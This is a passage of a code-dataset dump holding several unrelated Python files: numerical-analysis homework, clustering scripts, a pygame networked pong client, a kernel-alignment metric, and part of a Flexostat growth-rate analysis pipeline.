ys, 'bo')\n    plt.show()\n\n\nx = 0.00000001\nq2_est = f(x)\nfirst = 1 / x ** 2\nsecond = - math.sin(x) / math.pow(x, 3)\nq2_true = first + second\nfrom decimal import *\n\n\ndef f2(x):\n    \"\"\"\n    I use the Maclaurin expansion (the Taylor expansion about 0):\n    (x - sin(x)) / x**3 = 1/3! - x**2/5! + x**4/7! - ...\n    \"\"\"\n\n    # localcontext().prec = 100\n    summ = Decimal(0)\n\n    i = 3\n    flag = 0\n    while i < 1000:\n        fac = Decimal(math.factorial(i))\n        if flag % 2 == 0:\n            summ += Decimal(math.pow(x, i - 3)) / fac\n        else:\n            summ -= Decimal(math.pow(x, i - 3)) / fac\n        i += 2\n        flag += 1\n    return summ\n\n\n# q3 start----------------------------------------------------------------------\n# q3 start----------------------------------------------------------------------\nxs = [0.1, 0.5, 1.0, 3.0]\nq3_forward = [None, None, None, None]\nq3_backward = [None, None, None, None]\n\ntrue_value = [math.sin(i) for i in xs]\n\ndef function(x):\n    return x - math.pow(x, 3) / math.factorial(3)\nfor i in range(4):\n    q3_forward[i] = true_value[i] - function(xs[i])\n    q3_backward[i] = \"DNE\"\n","sub_path":"csc338/A1/hw1.py","file_name":"hw1.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"363795623","text":"import pandas as pd\nimport numpy as np\nimport time\nfrom sklearn.cluster import KMeans\nimport pickle\nimport io\nimport matplotlib.pyplot as plt\n\nt0 = time.time()\nprint(\"creating table.\")\ntable = pd.read_excel('Serviceorderhistorik.xlsx',\n\t\t\t\t\t\tsheetname = 'Jobhist',\n\t\t\t\t\t\theader = 0,\n\t\t\t\t\t\tindex_col = None,\n\t\t\t\t\t\tparse_cols = \"X, N\",\n\t\t\t\t\t\tconvert_float = False)\n\nprint(\"table created.\")\narray = np.array(table)\narray = array.astype(int)\nprint(\"table converted to numpy int-array\")\nprint(\"It took {} seconds to create the data structure.\".format(time.time()-t0))\nt0 = time.time()\narray = np.array(table).astype(int)\nplt.plot(array)\nplt.ylabel(\"things\")\nplt.show()\nprint(\"It took {} seconds to create the numpy array.\".format(time.time()-t0))\npickle.dump(array, io.open(\"pkl.p\", \"wb+\"))\nprint(\"It took {} seconds to create the pickle file.\".format(time.time()-t0))\n\nclusterer = KMeans()\nprint(\"fitting data...\")\nt0 = time.time()\nclusterer.fit(array)\nprint(\"data fitted in {} seconds!\".format(time.time()-t0))\n\n# A - Postal code\n# B - Customer no.\n# C - Cost","sub_path":"Code/excelToNumpyToPickle.py","file_name":"excelToNumpyToPickle.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"377965417","text":"\"\"\"\nExample of using the spectral clustering function of scikit-learn in order\nto segment glued objects.\n\"\"\"\n\nfrom sklearn.feature_extraction import image\nfrom sklearn.cluster import spectral_clustering\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nl = 100\nx, y = np.indices((l, l))\n\n# Image contains 4 circles\ncenter1 = (28, 24)\ncenter2 = (40, 50)\ncenter3 = (67, 58)\ncenter4 = (24, 70)\nradius1, radius2, radius3, radius4 = 16, 14, 15, 14\n\ncircle1 = (x - center1[0])**2 + (y - center1[1])**2 < radius1**2\ncircle2 = (x - center2[0])**2 + (y - center2[1])**2 < radius2**2\ncircle3 = (x - center3[0])**2 + (y - center3[1])**2 < radius3**2\ncircle4 = (x - center4[0])**2 + (y - center4[1])**2 < radius4**2\n\nimg = circle1 + circle2 + circle3 + circle4\n\n# Creating mask\nmask = img.astype(bool)\nimg = img.astype(float)\nimg += 1 + 0.2 * np.random.randn(*img.shape)\n\n# Convert the image into a graph with the value of the gradient on the edges.\ngraph = image.img_to_graph(img, mask=mask)\n\n# Take a decreasing function of the gradient: we take it weakly\n# dependent from the gradient the segmentation is close to a voronoi\ngraph.data = np.exp(-graph.data/graph.data.std())\n\n# Applying spectral clustering\nlabels = spectral_clustering(graph, n_clusters=4, eigen_solver='arpack')\nlabel_im = -np.ones(mask.shape)\nlabel_im[mask] = labels\n\n# Plotting results side by side\nplt.figure(figsize=(11,4))\n\nplt.subplot(121)\nplt.imshow(img)\nplt.axis('off')\n\nplt.subplot(122)\nplt.imshow(label_im)\nplt.axis('off')\n\nplt.show()","sub_path":"image_processing/spectral_clustering.py","file_name":"spectral_clustering.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"367503448","text":"import pygame,json\nfrom networking import communicate\nfrom threading import Thread\n\nPLAYER1_IP = '127.0.0.1'\nNAME = 'XYZ'\n\n\n\nHEIGHT = 500\nWIDTH = 500\nWHITE = (255,255,255)\nBLUE = (0,0,255)\n\n\n\nclass Player2(pygame.sprite.Sprite):\n    def __init__(self):\n        super().__init__()\n        self.height = 70\n        self.width = 10\n        self.image = pygame.Surface([self.width,self.height])\n        self.image.fill(WHITE)\n        self.rect = self.image.get_rect()\n        self.rect.x = WIDTH-self.width\n        self.rect.y = 100\n        self.is_alive = True\n    def update(self):\n        x, y = pygame.mouse.get_pos()\n        self.rect.y = y\n\nclass Ball(pygame.sprite.Sprite):\n    def __init__(self,WIDTH,HEIGHT):\n        self.WIDTH = WIDTH\n        self.HEIGHT = HEIGHT\n        super().__init__()\n        self.image = pygame.Surface([10,10])\n        self.image.fill(BLUE)\n        self.rect = self.image.get_rect()\n        self.rect.x = WIDTH/2\n        self.rect.y = HEIGHT/2\n\n\nplayer2 = Player2() \nball = Ball(WIDTH,HEIGHT)\n\nclass Player1(pygame.sprite.Sprite):\n    def __init__(self,ip_address,name):\n        self.ip_address = ip_address\n        self.com = communicate((ip_address,12345),name,12346)\n        super().__init__()\n        self.height=70\n        self.width = 10\n        self.image = pygame.Surface([self.width,self.height])\n        
self.image.fill(WHITE)\n self.rect = self.image.get_rect()\n self.rect.x = 0\n self.rect.y = 100\n self.is_alive = True\n self.data = dict()\n\n self.com.createConnection()\n if self.com.is_connected:\n print(\"connected to player 1\",self.com.get_connection_status()[0])\n else:\n self.com.closeconnection()\n print(\"unable to connect\")\n def handle_client(self):\n running = True\n\n while running:\n if not self.com.is_connected:\n print(\"out of network thread\")\n running = False\n if self.com.is_connected:\n\n json_string = self.com.get_data()\n self.data = json.loads(json_string)\n self.rect.y = self.data['y']\n ball.rect.x,ball.rect.y = self.data['ball']\n self.is_alive = self.data['p1_alive']\n player2.is_alive = self.data['p2_alive']\n \n self.data = dict()\n self.data['y'] = player2.rect.y\n json_string = json.dumps(self.data)\n self.com.send_data(json_string)\n \n def start_network_thread(self):\n thread = Thread(target=self.handle_client)\n print(\"starting network thread\")\n thread.start()\n\nplayer1 = Player1(PLAYER1_IP,NAME)\nBLACK = (0,0,0)\n\npygame.init()\ndisplay = pygame.display.set_mode((WIDTH,HEIGHT))\npygame.display.set_caption(\"ping pong client!\")\nclock = pygame.time.Clock()\n\n\n\n\n\n\nall_sprites = pygame.sprite.Group()\nall_sprites.add(player1)\nall_sprites.add(player2)\nall_sprites.add(ball)\n\nrunning =True\nplayer1.start_network_thread()\nwhile running:\n for event in pygame.event.get():\n if event.type==pygame.QUIT:\n running = False \n\n display.fill(BLACK) \n all_sprites.update()\n \n all_sprites.draw(display)\n pygame.display.flip()\n clock.tick(30)\n\n if not player1.is_alive:\n print(\"player 1 looses the game\")\n running = False\n elif not player2.is_alive:\n print(\"player 2 looses the game\")\n running = False\n\nplayer1.com.closeconnection()\npygame.quit()\nquit()","sub_path":"multiplayer/multiplayer_client.py","file_name":"multiplayer_client.py","file_ext":"py","file_size_in_byte":3531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"47479720","text":"\"\"\"Computes centered kernel alignment to measure similarity between layers\nRefer to this also - https://arxiv.org/pdf/1905.00414.pdf\n\"\"\"\n\nimport numpy as np\nimport torch\n\n\ndef np_center_kernel(K, copy=True):\n '''\n Centered version of a kernel matrix (corresponding to centering the)\n implicit feature map.\n '''\n means = K.mean(axis=0)\n if copy:\n K = K - means[None, :]\n else:\n K -= means[None, :]\n K -= means[:, None]\n K += means.mean()\n return K\n\n\ndef np_alignment(K1, K2):\n '''\n Returns the kernel alignment\n _F / (||K1||_F ||K2||_F)\n defined by\n Cristianini, Shawe-Taylor, Elisseeff, and Kandola (2001).\n On Kernel-Target Alignment. NIPS.\n Note that the centered kernel alignment of\n Cortes, Mohri, and Rostamizadeh (2012).\n Algorithms for Learning Kernels Based on Centered Alignment. 
JMLR 13.\n    is just this applied to center_kernel()s.\n    '''\n    return np.sum(K1 * K2) / np.linalg.norm(K1) / np.linalg.norm(K2)\n\n\ndef center_kernel(X, copy=True):\n    '''\n    Centered version of a kernel matrix (corresponding to centering the\n    implicit feature map).\n    '''\n    means = X.mean(axis=0)\n    if copy:\n        X = X - means[None, :]\n    else:\n        X -= means[None, :]\n    X -= means[:, None]\n    X += means.mean()\n    return X\n\n\ndef alignment(x, y): return torch.sum(x * y) / torch.norm(x) / torch.norm(y)\n\n\ndef test_alignment(x=None, y=None, nump=False):\n    if x is None and y is None:\n        x = torch.randn((100, 10))\n        y = torch.randn((100, 10))\n    print(alignment(x, y))\n    if nump:\n        print(np_alignment(x.numpy(), y.numpy()))\n\n\nif __name__ == \"__main__\":\n\n    test_alignment(nump=True)","sub_path":"util/metrics/kernel.py","file_name":"kernel.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"338100513","text":"\n\"\"\"\nBACKGROUND\n\n\tCreated January 31, 2018\n\t\tby David Klein, using previous code from Maxwell Raderstorf\n\t\tcontributions found at https://github.com/Siegallab/Flexostat-interface\n\tAn open source feature contribution to the Klavins Lab Flexostat project\n\t\tproject found at https://github.com/Flexostat/Flexostat-interface\n\nINSTRUCTIONS\n\n\tRun using Python 3 on the command line as such\n\t$ python3 Growth-Pipe.py -h\n\"\"\"\n\nimport numpy\nimport matplotlib.pyplot as plt\nimport pandas\nimport os\nimport argparse\nimport warnings\nimport csv\nimport math\nfrom math import log10\nfrom datetime import datetime\n\ndef main():\n\t\"\"\"\n\tDefines the command line arguments taken in by the program.\n\tEnsures there is a config file to work with before calling the 'functions' function.\n\t\"\"\"\n\t# Allows warnings from divide by zero or log/ln negative number to be caught in try except\n\twarnings.filterwarnings('error')\n\targs = command_line_parameters()\n\n\tif os.path.exists(args.config):\n\t\tpaths, process_log, exp = config_variables(args)\n\t\tprocess_log = functions(args, paths, process_log, exp)\n\t\t# print and save process log\n\t\tlog_functions(args, paths, process_log, exp)\n\telse:\n\t\tprint('ERROR: Config file not found.')\n\tprint('Program end.\\n')\n\n\ndef command_line_parameters():\n\t\"\"\"\n\tTakes in command line argument parameters and displays help descriptions.\n\n\t:return: variable containing all command line argument parameters\n\t\"\"\"\n\tparser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,\n\t\t\t\t\tdescription=\"\"\"\n\t\t\tGrowth Rate Analysis Pipeline\n\t\t\t-----------------------------\n\t\t\tSelect at least one data set: --u, --od\n\t\t\tSelect at least one function: --parse (-p), --odlog,\n\t\t\t\t\t--rate (-r), --stats, --r_stats, --graph\n\n\t\t\tOptional changes: --config, --log (-l), --print\n\t\t\tOptional stats parameters: --block (-b) or --interval (-i)\n\t\t\tOptional graph parameters: --xlim (-x), --ylim (-y), --sd, --se\n\t\t\t\t\t\t\"\"\")\n\n\tparser.add_argument('--u', action='store_true', help='specify dilutions data set')\n\tparser.add_argument('--od', action='store_true', help='specify optical density data set')\n\n\tparser.add_argument('-p', '--parse', action='store_true', help='parse log file into clean data set')\n\tparser.add_argument('--odlog', action='store_true', help='parse odlog file into clean data set')\n\tparser.add_argument('-r', '--rate', action='store_true', help='calculate 
growth rate from data set')\n\tparser.add_argument('--stats', action='store_true', help='calculate mean, SD, and SE from data set')\n\tparser.add_argument('--r_stats', action='store_true', help='calculate mean, SD, and SE from growth rates of data set')\n\tparser.add_argument('--graph', default='0', help=\"graph specified data: 1 for main u/od, 2 for main stats, 3 for growth rates,\" + \n\t\t\t\t\" 4 for growth stats (e.g. '--graph 1234' for all)\")\n\n\tparser.add_argument('-i', '--interval', default='1',\n\t\t\t\t\t\thelp=\"modify default hour time interval for stats by multiplication (e.g. '-i 0.5' = 30 min, '-i 2' = 2 hrs)\")\n\tparser.add_argument('-b', '--block', action='store_true', help='specify separation of statistics based on block dilutions')\n\tparser.add_argument('--sd', action='store_true', help='display standard deviation bars on graphs')\n\tparser.add_argument('--se', action='store_true', help='display standard error bars on graphs')\n\t# parser.add_argument('--ci', action='store_true', help='display confidence interval bars on graphs')\n\tparser.add_argument('-x', '--xlim', default='0-0', help=\"limit data to upper and lower bound x (e.g. '-x 5-10')\")\n\tparser.add_argument('-y', '--ylim', default='0-0', help=\"limit data to upper and lower bound y (e.g. '-y 5-10')\")\n\tparser.add_argument('--config', default='config-growth.csv',\n\t\t\t\t\t\thelp=\"change config file from default 'config-growth.csv'\")\n\tparser.add_argument('-l', '--log', action='store_true', help='optional save program processes to log text file')\n\tparser.add_argument('--print', action='store_true', help='optional program processes printing')\n\n\targs = parser.parse_args()\n\treturn args\n\n\ndef config_variables(args):\n\t\"\"\"\n\tReads in variables from config file for growth pipe, ensures directories exist, and starts log for program processes.\n\n\t:param args: list of command line arguments\n\t:return: list with config file paths and log with program processes\n\t\"\"\"\n\t# begin log to keep track of program processes\n\t# read in config file and save all config variables to local variables in a dictionary\n\tprocess_log = '\\n[Growth-Pipe] ' + datetime.now().strftime(\"%Y-%m-%d %H:%M\")\n\tpaths = {\n\t\t# general local variables\n\t\t'' : '', 'log file' : '', 'odlog' : '', 'blank' : '', 'block' : '',\n\t\t'log processes' : '', 'data directory' : '', 'experiment' : '', \n\t\t# dilution local variables\n\t\t'u' : '', 'u statistics' : '', 'u machine time' : '',\n\t\t'u growth rates' : '', 'u growth statistics' : '',\n\t\t# optical density local variables\n\t\t'od' : '', 'u statistics' : '', 'od machine time' : '', \n\t\t'od growth rates' : '', 'od growth statistics' : '',\n\t\t# dilution graph local variables\n\t\t'u graphs' : '', 'u statistics graphs' : '', 'u growth rates graphs' : '', 'u growth statistics graphs' : '',\n\t\t# optical density graph local variables\n\t\t'od graphs' : '', 'od statistics graphs' : '', 'od growth rates graphs' : '', 'od growth statistics graphs' : ''\n\t}\n\twith open(args.config) as config_file:\n\t\treader = csv.reader(config_file)\n\t\tfor row in reader:\n\t\t\t# removes any ending slashes that may exist in csv\n\t\t\tif row[1][-1] == '/':\n\t\t\t\trow[1] = row[1][:-1]\n\t\t\tpaths[row[0]] = row[1]\n\t\t\tif len(row[4]) >= 1:\n\t\t\t\tif row[4][-1] == '/':\n\t\t\t\t\trow[4] = row[1][:-1]\n\t\t\tpaths[row[3]] = row[4]\n\tconfig_file.close()\n\n\t# ensure data and experiment directories exist\n\t# format paths to variable appropriately\n\tif 
paths['experiment'][-1] == \"'\":\n\t\tpaths['experiment'] = paths['experiment'][:-1]\n\tif os.path.exists(paths['data directory']):\n\t\tprocess_log += '\\nData directory found.'\n\telse:\n\t\tos.system(\"mkdir '{}'\".format(paths['data directory']))\n\t\tprocess_log += '\\nData directory not found. Made new one.'\n\texp = '{}/{}/'.format(paths['data directory'], paths['experiment'])\n\tif os.path.exists(exp):\n\t\tprocess_log += '\\nExperiment directory found.'\n\telse:\n\t\tos.system(\"mkdir '{}'\".format(exp))\n\t\tprocess_log += '\\nExperiment directory not found. Made new one.'\n\treturn paths, process_log, exp\n\n\ndef functions(args, paths, process_log, exp):\n\t\"\"\"\n\tRuns all functions specified by the command line arguments using the config file variables, while taking not in the log variable.\n\n\t:param args: list of command line arguments\n\t:param paths: list with config file paths\n\t:param process_log: log for keeping track of processes\n\t:param exp: path to experiment\n\t:return: log of all processes that were run\n\t\"\"\"\n\t# make sure at least one data set is specified\n\tif not args.u and not args.od:\n\t\tprint('ERROR: Data set not specified.')\n\tif args.u:\n\t\t# parse function takes log file and exports u csv\n\t\tif args.parse:\n\t\t\twith open(exp + paths['log file'] + '.dat') as f: # open input file\n\t\t\t\tlog = f.read()\n\n\t\t\tprocess_log += '\\nParsing u from log file...'\n\t\t\tudata = parse_u(log)\n\n\t\t\t# tell user if file exists and will be overwritten or if new file will be made\n\t\t\tif os.path.exists(exp + paths['u'] + '.csv'):\n\t\t\t\tprocess_log += '\\n\\tOutput file exists, will overwrite.'\n\t\t\telse:\n\t\t\t\tprocess_log += '\\n\\tOutput file not found, will make new file.'\n\n\t\t\tufile = open(exp + paths['u'] + '.csv', 'w')\n\t\t\twru = csv.writer(ufile, quoting=csv.QUOTE_ALL)\n\t\t\tfor u in udata:\n\t\t\t\twru.writerow(u)\n\n\t\t\tf.close()\n\t\t\tufile.close()\n\t\t\tprocess_log += '\\n\\tParsed csv created and exported.'\n\t\t# rate function takes u csv and exports u growth rate csv\n\t\tif args.rate:\n\t\t\tprocess_log += '\\nGrowth rates for u calculating...'\n\t\t\tprocess_log = machine_to_human(exp + paths['u'], exp + paths['u machine time'], process_log)\n\n\t\t\t# tell user if file exists and will be overwritten or if new file will be made\n\t\t\tif os.path.exists(exp + paths['u growth rates'] + '.csv'):\n\t\t\t\tprocess_log += '\\n\\tOutput file exists, will overwrite.'\n\t\t\telse:\n\t\t\t\tprocess_log += '\\n\\tOutput file not found, will make new file.'\n\n\t\t\tu_rate(exp + paths['u'], exp + paths['u growth rates'])\n\t\t\tprocess_log += '\\n\\tGrowth rates calculated and exported.'\n\t\t# stats function takes u csv and exports a csv for each chamber\n\t\tif args.stats:\n\t\t\tprocess_log += '\\nStats for u calculating...'\n\t\t\tdead, dead, process_log = validate_output_path(args, exp + paths['u statistics'], False, process_log)\n\t\t\tif args.block:\n\t\t\t\tstatistics(exp + paths['u'], exp + paths['u statistics'], args.interval, exp + paths['block'])\n\t\t\telse:\n\t\t\t\tstatistics(exp + paths['u'], exp + paths['u statistics'], args.interval, '')\n\t\t\tprocess_log += '\\n\\tStats csv calculated and exported.'\n\t\t# stats function takes u growth rate csv and exports a csv for each chamber\n\t\tif args.r_stats:\n\t\t\tprocess_log += '\\nStats for u growth rates calculating...'\n\t\t\tdead, dead, process_log = validate_output_path(args, exp + paths['u growth statistics'], False, process_log)\n\t\t\tif 
args.block:\n\t\t\t\tstatistics(exp + paths['u growth rates'], exp + paths['u growth statistics'], args.interval, exp + paths['block'])\n\t\t\telse:\n\t\t\t\tstatistics(exp + paths['u growth rates'], exp + paths['u growth statistics'], args.interval, '')\n\t\t\tprocess_log += '\\n\\tStats csv calculated and exported.'\n\t\t# graph functions take specific od csv and exports graphs based on command line arguments\n\t\tif args.graph:\n\t\t\tif '1' in args.graph:\n\t\t\t\tprocess_log += '\\nGraphing for u...'\n\t\t\t\toutput, limits, process_log = validate_output_path(args, exp + paths['u graphs'], True, process_log)\n\t\t\t\tgraphs(args, exp + paths['u'], output, limits)\n\t\t\t\tprocess_log += '\\n\\tGraphs exported.'\n\t\t\tif '2' in args.graph:\n\t\t\t\tprocess_log += '\\nGraphing for u stats...'\n\t\t\t\toutput, limits, process_log = validate_output_path(args, exp + paths['u statistics graphs'], True, process_log)\n\t\t\t\tgraphs(args, exp + paths['u statistics'], output, limits)\n\t\t\t\tprocess_log += '\\n\\tGraphs exported.'\n\t\t\tif '3' in args.graph:\n\t\t\t\tprocess_log += '\\nGraphing for u growth rates...'\n\t\t\t\toutput, limits, process_log = validate_output_path(args, exp + paths['u growth rates graphs'], True, process_log)\n\t\t\t\tgraphs(args, exp + paths['u growth rates'], output, limits)\n\t\t\t\tprocess_log += '\\n\\tGraphs exported.'\n\t\t\tif '4' in args.graph:\n\t\t\t\tprocess_log += '\\nGraphing for u growth stats...'\n\t\t\t\toutput, limits, process_log = validate_output_path(args, exp + paths['u growth statistics graphs'], True, process_log)\n\t\t\t\tgraphs(args, exp + paths['u growth statistics'], output, limits)\n\t\t\t\tprocess_log += '\\n\\tGraphs exported.'\n\tif args.od:\n\t\t# parse function takes log file and exports od csv\n\t\tif args.parse:\n\t\t\tprocess_log += '\\nParsing od from log file...'\n\t\t\twith open(exp + paths['log file'] + '.dat') as f: # open input file\n\t\t\t\tlog = f.read()\n\n\t\t\toddata = parse_od(log)\n\n\t\t\t# tell user if file exists and will be overwritten or if new file will be made\n\t\t\tif os.path.exists(exp + paths['od'] + '.csv'):\n\t\t\t\tprocess_log += '\\n\\tOutput file exists, will overwrite.'\n\t\t\telse:\n\t\t\t\tprocess_log += '\\n\\tOutput file not found, will make new file.'\n\n\t\t\todfile = open(exp + paths['od'] + '.csv', 'w')\n\t\t\twrod = csv.writer(odfile, quoting=csv.QUOTE_ALL)\n\t\t\tfor od in oddata:\n\t\t\t\twrod.writerow(od)\n\n\t\t\tf.close()\n\t\t\todfile.close()\n\t\t\tprocess_log += '\\n\\tParsed csv created and exported.'\n\t\t# parse function takes odlog file and exports od csv\n\t\tif args.odlog:\n\t\t\tprocess_log += '\\nParsing od from odlog file...'\n\t\t\t# tell user if file exists and will be overwritten or if new file will be made\n\t\t\tif os.path.exists(exp + paths['od'] + '.csv'):\n\t\t\t\tprocess_log += '\\n\\tOutput file exists, will overwrite.'\n\t\t\telse:\n\t\t\t\tprocess_log += '\\n\\tOutput file not found, will make new file.'\n\t\t\tparse_odlog(exp + paths['odlog'], exp + paths['blank'], exp + paths['od'])\n\t\t\tprocess_log += '\\n\\tParsed csv created and exported.'\n\t\t# rate function takes od csv and exports od growth rate csv\n\t\tif args.rate:\n\t\t\tprocess_log += '\\nGrowth rates for od calculating...'\n\t\t\tprocess_log = machine_to_human(exp + paths['od'], exp + paths['od machine time'], process_log)\n\n\t\t\t# tell user if file exists and will be overwritten or if new file will be made\n\t\t\tif os.path.exists(exp + paths['od growth rates'] + 
'.csv'):\n\t\t\t\tprocess_log += '\\n\\tOutput file exists, will overwrite.'\n\t\t\telse:\n\t\t\t\tprocess_log += '\\n\\tOutput file not found, will make new file.'\n\n\t\t\tod_rate(exp + paths['od'], exp + paths['od growth rates'])\n\t\t\tprocess_log += '\\n\\tGrowth rates calculated and exported.'\n\t\t# stats function takes od csv and exports a csv for each chamber\n\t\tif args.stats:\n\t\t\tprocess_log += '\\nStats for od calculating...'\n\t\t\tdead, dead, process_log = validate_output_path(args, exp + paths['od statistics'], False, process_log)\n\t\t\tif args.block:\n\t\t\t\tstatistics(exp + paths['od'], exp + paths['od statistics'], args.interval, exp + paths['block'])\n\t\t\telse:\n\t\t\t\tstatistics(exp + paths['od'], exp + paths['od statistics'], args.interval, '')\n\t\t\tprocess_log += '\\n\\tStats csv calculated and exported.'\n\t\t# stats function takes od growth rate csv and exports a csv for each chamber\n\t\tif args.r_stats:\n\t\t\tprocess_log += '\\nStats for od growth rates calculating...'\n\t\t\tdead, dead, process_log = validate_output_path(args, exp + paths['od growth statistics'], False, process_log)\n\t\t\tif args.block:\n\t\t\t\tstatistics(exp + paths['od growth rates'], exp + paths['od growth statistics'], args.interval, exp + paths['block'])\n\t\t\telse:\n\t\t\t\tstatistics(exp + paths['od growth rates'], exp + paths['od growth statistics'], args.interval, '')\n\t\t\tprocess_log += '\\n\\tStats csv calculated and exported.'\n\t\t# graph functions take specific od csv and exports graphs based on command line arguments\n\t\tif args.graph:\n\t\t\tif '1' in args.graph:\n\t\t\t\tprocess_log += '\\nGraphing for od...'\n\t\t\t\toutput, limits, process_log = validate_output_path(args, exp + paths['od graphs'], True, process_log)\n\t\t\t\tgraphs(args, exp + paths['od'], output, limits)\n\t\t\t\tprocess_log += '\\n\\tGraphs exported.'\n\t\t\tif '2' in args.graph:\n\t\t\t\tprocess_log += '\\nGraphing for od stats...'\n\t\t\t\toutput, limits, process_log = validate_output_path(args, exp + paths['od statistics graphs'], True, process_log)\n\t\t\t\tgraphs(args, exp + paths['od statistics'], output, limits)\n\t\t\t\tprocess_log += '\\n\\tGraphs exported.'\n\t\t\tif '3' in args.graph:\n\t\t\t\tprocess_log += '\\nGraphing for od growth rates...'\n\t\t\t\toutput, limits, process_log = validate_output_path(args, exp + paths['od growth rates graphs'], True, process_log)\n\t\t\t\tgraphs(args, exp + paths['od growth rates'], output, limits)\n\t\t\t\tprocess_log += '\\n\\tGraphs exported.'\n\t\t\tif '4' in args.graph:\n\t\t\t\tprocess_log += '\\nGraphing for od growth stats...'\n\t\t\t\toutput, limits, process_log = validate_output_path(args, exp + paths['od growth statistics graphs'], True, process_log)\n\t\t\t\tgraphs(args, exp + paths['od growth statistics'], output, limits)\n\t\t\t\tprocess_log += '\\n\\tGraphs exported.'\n\treturn process_log\n\n\ndef machine_to_human(intake, output, process_log):\n\t\"\"\"\n\tConverts machine time (seconds with starting time long ago) to hours from experiment start.\n\tGenerates new csv and renames the old csv.\n\n\t:param intake: path to data\n\t:param output: path for export\n\t:param process_log: log for keeping track of processes\n\t:return: returns updated log of program processes\n\t\"\"\"\n\tdf = pandas.read_csv('{}.csv'.format(intake), header=None,\n\t\t\t\t\t\t\tnames=['Time', '1', '2', '3', '4', '5', '6', '7', '8'])\n\ttime_start = df.iloc[0, 0]\n\t# Checks if the first time point is in machine time\n\tif time_start > 1:\n\t\tprocess_log 
+= '\\n\\tData set is using machine time. Converting to human time...'\n\t\t# Renames the csv using machine time\n\t\tcommand = \"mv '{}.csv' '{}.csv'\".format(intake, output)\n\t\tos.system(command)\n\t\tnew_data = []\n\t\t# Iterates through rows of csv and changes time point to hours in new row array\n\t\t# Joins each array into new data array and saves to a new csv\n\t\tfor row in df.itertuples():\n\t\t\tnew_row = []\n\t\t\trow_id = True\n\t\t\tfor element in row:\n\t\t\t\tif row_id:\n\t\t\t\t\trow_id = False\n\t\t\t\telif len(new_row) == 0:\n\t\t\t\t\tnew_row.append((element - time_start) / 3600)\n\t\t\t\telse:\n\t\t\t\t\tnew_row.append(element)\n\t\t\tnew_data.append(new_row)\n\t\tnumpy.savetxt('{}.csv'.format(intake), new_data, delimiter=\",\")\n\t\tprocess_log += '\\n\\tData set is using machine time. Data set with human time created.'\n\telse:\n\t\tprocess_log += '\\n\\tData set is using human time.'\n\t\n\treturn process_log\n\n\ndef validate_output_path(args, output, function, process_log):\n\t\"\"\"\n\tCreates the output folder if there is none.\n\tParses limits for graphs based on command line parameters.\n\n\t:param args: command line argument array for limit parsing\n\t:param output: path for export\n\t:param function: specify true if function is graphs for limit parsing\n\t:param process_log: log for keeping track of processes\n\t:return: new output based on limits, limits for graphs, and updated log for program processes\n\t\"\"\"\n\tlim_str = ''\n\tlimits = [0.0, 0.0, 0.0, 0.0]\n\t# graphs will have x and y limits parsed and used for the output directory\n\tif function:\n\t\tif args.xlim:\n\t\t\ttemp = args.xlim\n\t\t\tlimits[0] = float(temp.split(\"-\")[0])\n\t\t\tlimits[1] = float(temp.split(\"-\")[1])\n\t\t\tlim_str = lim_str + ' x' + args.xlim\n\t\tif args.ylim:\n\t\t\ttemp = args.ylim\n\t\t\tlimits[2] = float(temp.split(\"-\")[0])\n\t\t\tlimits[3] = float(temp.split(\"-\")[1])\n\t\t\tlim_str = lim_str + ' y' + args.ylim\n\t\tif args.sd:\n\t\t\tlim_str = lim_str + ' sd'\n\t\telif args.se:\n\t\t\tlim_str = lim_str + ' se'\n\n\t# create an output directory if none exists\n\tif not os.path.exists('{}{}'.format(output, lim_str)):\n\t\tos.system(\"mkdir '{}{}'\".format(output, lim_str))\n\t\tprocess_log += '\\n\\tOutput folder not found, made new folder.'\n\telse:\n\t\tprocess_log += '\\n\\tOutput folder found, will overwrite previous files.'\n\toutput = '{}{}'.format(output, lim_str)\n\n\treturn output, limits, process_log\n\n\ndef parse_u(rdata):\n\t\"\"\"\n\tParses dilution values from the log file.\n\n\t:param rdata: string of log file contents\n\t:return: array of all dilution values\n\t\"\"\"\n\tlines = rdata.split('\\n') # Parse input file into list of lines\n\tdata = []\n\tfor line in lines[:-1]:\n\t\td1 = line.split(\":\")\n\t\td2 = [int(d1[1][:-7])]\n\t\tus = d1[3][2:-6].split(\",\")\n\t\tfor u in us:\n\t\t\td2.append(float(u))\n\t\tdata.append(tuple(d2))\n\n\treturn data\n\n\ndef parse_od(rdata):\n\t\"\"\"\n\tParses optical density values from the log file.\n\n\t:param rdata: string of log file contents\n\t:return: array of all optical density values\n\t\"\"\"\n\tlines = rdata.split('\\n') # Parse input file into list of lines\n\tdata = []\n\tfor line in lines[:-1]:\n\t\td1 = line.split(\":\")\n\t\td2 = [int(d1[1][:-7])]\n\t\tods = d1[2][2:-6].split(\",\")\n\t\tfor od in ods:\n\t\t\td2.append(float(od))\n\t\tdata.append(tuple(d2))\n\n\treturn data\n\n\ndef parse_odlog(odlog, blank, output):\n\t\"\"\"\n\tParses optical density values from the odlog 
